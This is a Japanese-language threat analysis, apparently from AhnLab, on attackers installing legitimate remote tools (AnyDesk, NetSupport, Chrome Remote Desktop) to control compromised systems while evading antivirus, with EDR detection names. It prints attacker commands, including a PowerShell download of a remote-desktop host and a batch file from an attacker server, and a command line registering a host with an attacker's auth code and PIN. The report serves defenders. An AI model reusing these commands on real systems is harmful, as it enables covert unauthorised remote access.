遠隔操作ツールは、遠隔地にある端末を管理し、操作する機能を提供するソフトウェアである。コロナウイルスのような環境で在宅勤務ソリューションとしても活用が可能であり、無人端末をリモートで操作、管理およびメンテナンスする用途としても活用される。このように正常な管理目的で使用する遠隔操作ツールを RAT、すなわち「Remote Administration Tool」と呼ぶ。
参考に、Remcos RAT や njRAT、Quasar RAT、AveMaria のようにリモートで感染システムを操作できるバックドアタイプのマルウェアも RAT(Remote Access Trojan)と称するが、これは遠隔地から感染システムを操作できるためである。このような「Remote Access Trojan」マルウェアは一般的に遠隔操作機能だけでなく、キーロガーや感染システム内に存在するアカウント情報を窃取するコマンド等、悪意を持って使用できる様々な機能を提供する。もちろん Remcos RAT のように制作者が正常な機能をアピールしつつ、悪意を持った使用を禁止すると謳っていながら、実際にサポートする機能は悪意を持った目的でなければまず使用されない機能が含まれている事例も存在する。[1]
一般的に攻撃者たちは感染システムを操作するための目的で「Remote Access Trojan」を使用する場合が多い。しかしながら、これらのようなマルウェアはファイアウォールやアンチウイルス製品により容易に検知が可能である。そのため、最近では感染システムを操作するために「Remote Administration Tool」をインストールし、セキュリティ製品を回避しようと試みる事例が増加している。
1. EDR を利用した脅威モニタリング
「Remote Administration Tool」は、在宅勤務や遠隔操作、および管理のための正常な目的で使用する事例が多い。これにより、アンチウイルス製品では一般的なマルウェアとは異なり、このようなツールを単純に検知して遮断するのに限界がある。
攻撃者たちは、このような点を悪用して初期侵入プロセスやラテラルムーブメントのプロセスで攻撃対象のシステムを制御するため、RAT マルウェアの代わりに遠隔操作ツールをインストールする場合もある。アンチウイルスのみがインストールされているシステムではこのような攻撃を防ぐのに限界があり、EDR を活用して疑わしい振る舞いをモニタリングして対処する必要がある。
AhnLab EDR(Endpoint Detection and Reponse)は、韓国国内唯一の振る舞いベースの解析エンジンをもとに、エンドポイント領域に対する強力な脅威モニタリングと解析、対応能力を提供する次世代エンドポイント脅威検知・対応ソリューションである。AhnLab EDR は疑わしい振る舞いに関するタイプ別情報を常時収集し、検知および解析、対応の観点からユーザーが脅威を正確に認識することができる機能を提供し、これによって総合的な解析を通じて原因把握と適切な対応、再発防止プロセスを確立できる。
2. AnyDesk
AnyDesk は遠隔操作ツールであり、リモートデスクトップ、ファイル送信等の様々な機能を提供している。リモートデスクトップといえば RDP と同じく、AnyDesk がインストールされている環境に遠隔で接続し、GUI 環境での操作をサポートするプログラムである。
特定のユーザー環境に AnyDesk がインストールされており、外部から当該システムにアクセスしようとすると、メッセージがポップアップで表示され、ユーザーがこれを許可すると外部から当該システムへの遠隔操作が可能になる。このような方法以外にも AnyDesk ではパスワードを設定できるが、この時はパスワードを入力するだけでユーザーの許可なく遠隔操作が可能になる。このような特徴により、実際のところ AnyDesk は Conti ランサムウェアグループと同様、企業のイントラネットを掌握することを目標とする攻撃者の Cobalt Strike と共に使用されることが知られている。
AhnLab EDR ではユーザーが遠隔操作のために正常な目的で AnyDesk を使用する振る舞いについても関連情報を収集して表示することにより、疑わしい振る舞いを認知して対処できるようにサポートする。
過去の攻撃事例において、攻撃者は不適切に管理されている MS-SQL サーバーを対象に AnyDesk をインストールした。[2] 攻撃者は Meterpreter を利用して PowerShell スクリプトをダウンロードして実行したが、このスクリプトは以下のように公式ホームページから AnyDesk をダウンロードして Silent モードでインストールしたあと、パスワード「wocaoybb」を設定する機能を担う。
このような方式によって AnyDesk が感染システムにインストールされると、攻撃者は以下のように感染システムにアクセスしてパスワードを入力する。これによってユーザーの同意なしに遠隔操作が可能になる。
AhnLab EDR では上記の事例のように攻撃者が疑わしい方法で AnyDesk をインストールする振る舞いに対し、脅威として検知し、管理者がこれを認知できるようにサポートする。
3. NetSupport
NetSupport は AnyDesk と類似した遠隔操作ツールであり、リモート画面の操作以外にもスクリーンキャプチャ、クリップボードの共有、Web 履歴情報の収集、ファイル管理、コマンド実行のような機能を提供する。
AhnLab EDR ではユーザーが遠隔操作のために正常な目的で NetSupport を使用する振る舞いについても関連情報を収集して表示することにより、疑わしい振る舞いを認知して対処できるようにサポートする。
他の遠隔操作ツールと比較して、悪意を持った目的で使用できる機能がサポートされている点や、正常なインストーラーを利用したインストールプロセスがなく、内部の主要ファイルのみを使用して動作が可能である点により、様々な攻撃者が NetSupport を悪用している。送り状(Invoice)、船積書類(Shipment Document)、発注書(P.O.– Purchase Order)等に偽装したスパムメールを通じて配布されたり、SocGholish というソフトウェアのアップデートに偽装したフィッシングページを通じてユーザーにインストールを誘導する事例は、最近でも続いている。ASEC では過去、ポケモンのゲームに偽装した NetSupport マルウェアの配布事例を公開したことがある。[3]
攻撃者はポケモンのカードゲームに偽装したフィッシングページを開設し、ユーザーがその Web ページにアップロードされたインストーラーをダウンロードするように誘導した。ダウンロードされたファイルは NetSupport をインストールするマルウェアであり、正常な NetSupport プログラムと、攻撃者が捏造した設定ファイルを生成して実行する。攻撃者たちはマルウェアを配布するたびにアンチウイルスによって検知されないよう、ファイルの見た目を変更する方式でアンチウイルスのファイル検知を回避する。これにより、ファイルベースの検知には限界があり、振る舞いとしても正常なソフトウェアである NetSupport をインストールする方式であるため、アンチウイルスでこれを検知して遮断するには限度がある。
AhnLab EDR では上記の事例のように疑わしい実行ファイルが NetSupport をインストールする振る舞いに対し、脅威として検知し、管理者がこれを認知できるようにサポートする。
4. Chrome Remote Desktop
Google は Chrome リモートデスクトップ(Chrome Remote Desktop)という機能をサポートしている。特定のシステムにユーザーのアカウントでリモートデスクトッププログラムをインストールすると、他のシステムから Chrome Web ブラウザで当該システムに対する遠隔操作機能を提供する機能である。一般的に遠隔操作対象となるシステムの Chrome ブラウザで遠隔操作を設定する方式がほとんどだが、Chrome は直接遠隔操作ホストプログラムをインストールする方式もサポートしている。
例えば、遠隔操作対象の機器に Chrome の遠隔操作ホストプログラムをインストールして、以下のような引数とともにコマンドラインによる命令を実行することができる。このコマンドは Chrome Web ブラウザでログインしたあとで生成でき、認証コードは毎回変更される。
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”認証コード” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% |
上記のようなコマンドを実行したあと PIN 番号を入力すると、Chrome Web ブラウザで遠隔操作対象の機器がオンライン状態であることを示す。当該機器に接続して Chrome の遠隔操作ホストを実行時、入力した PIN 番号を入力することで Chrome Web ブラウザでの遠隔操作が可能になる。
AhnLab EDR ではユーザーが遠隔操作のために正常な目的で Chrome リモートデスクトップを使用する振る舞いについても関連情報を収集して表示することにより、疑わしい振る舞いを認知して対処できるようにサポートする。
北朝鮮の支援を受けていることで知られている Kimsuky グループは、主に組織の内部情報および技術の窃取を目的として攻撃を行っている。これにより、バックドアマルウェアをインストールした後でも、感染システムをリモートで操作するために RDP を有効化したり、VNC のようなマルウェアをさらにインストールする場合もある。最近では、Chrome リモートデスクトップを悪用して感染システムを操作する事例が確認された。[4]
攻撃者は、以下のような PowerShell コマンドを実行して Chrome リモートデスクトップのホストインストーラーをインストールし、インストールが完了すると Chrome リモートデスクトップのホストを操作する 23.bat ファイルをダウンロードして実行した。
| powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -outfile c:\programdata\cm.msi powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\programdata\23.bat |
23.bat ファイルは上記の Chrome リモートデスクトップ実行コマンドと類似しており、「–pin」引数とともに使用され、コマンドライン上でも追加のタスクを実行せずに動作が可能となっている。攻撃に使われた認証コードは攻撃者の Google アカウントで制作されたものだが、これにより攻撃者は Chrome Web ブラウザから感染システムを操作できるようになる。
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% –pin=230625 |
AhnLab EDR では上記の事例のように疑わしい方式で Chrome リモートデスクトップを実行する振る舞いに対し、脅威として検知し、管理者がこれを認知できるようにサポートする。
5. 結論
最近、攻撃者たちは攻撃対象を操作するために RAT やバックドアのような追加マルウェアの代わりに、遠隔操作ツールをインストールする事例が増加している。遠隔操作ツールは、遠隔地の端末を操作、または管理するための目的で使用できる正常なソフトウェアである。
攻撃者は、攻撃対象のシステムに遠隔操作ツールをインストールすることにより攻撃対象のシステムを操作すると同時に、アンチウイルスベースのセキュリティ製品による検知を回避することができる。これは、遠隔操作ツールが正常なソフトウェアであることにより、アンチウイルス製品がそれらを単純に検知して遮断することに限度があるためである。
AhnLab EDR はユーザーが遠隔操作のために正常な目的で遠隔操作ツールを使用する振る舞いについても関連情報を収集して表示することにより、管理者が疑わしい振る舞いを認知して対処できるようにする。また、遠隔操作ツールが疑わしい方式でインストールされた場合、これを脅威として検知し管理者が原因を把握して適切な対処、および再発防止プロセスを確立できるようにサポートする。
振る舞い検知
– Execution/DETECT.AnyDesk.M11495
– Execution/EDR.AnyDesk.M11496
– Execution/DETECT.NetSupport.M11497
– Execution/EDR.NetSupport.M11498
– Execution/DETECT.RemoteDesktop.M11499
– Execution/EDR.RemoteDesktop.M11500
振る舞い情報検知および解析を通じたエンドポイント可視性を提供し、脅威を能動的に追跡する AhnLab EDR についての詳しい情報は AhnLab の公式 HP で確認できる。
Categories: AhnLab 検知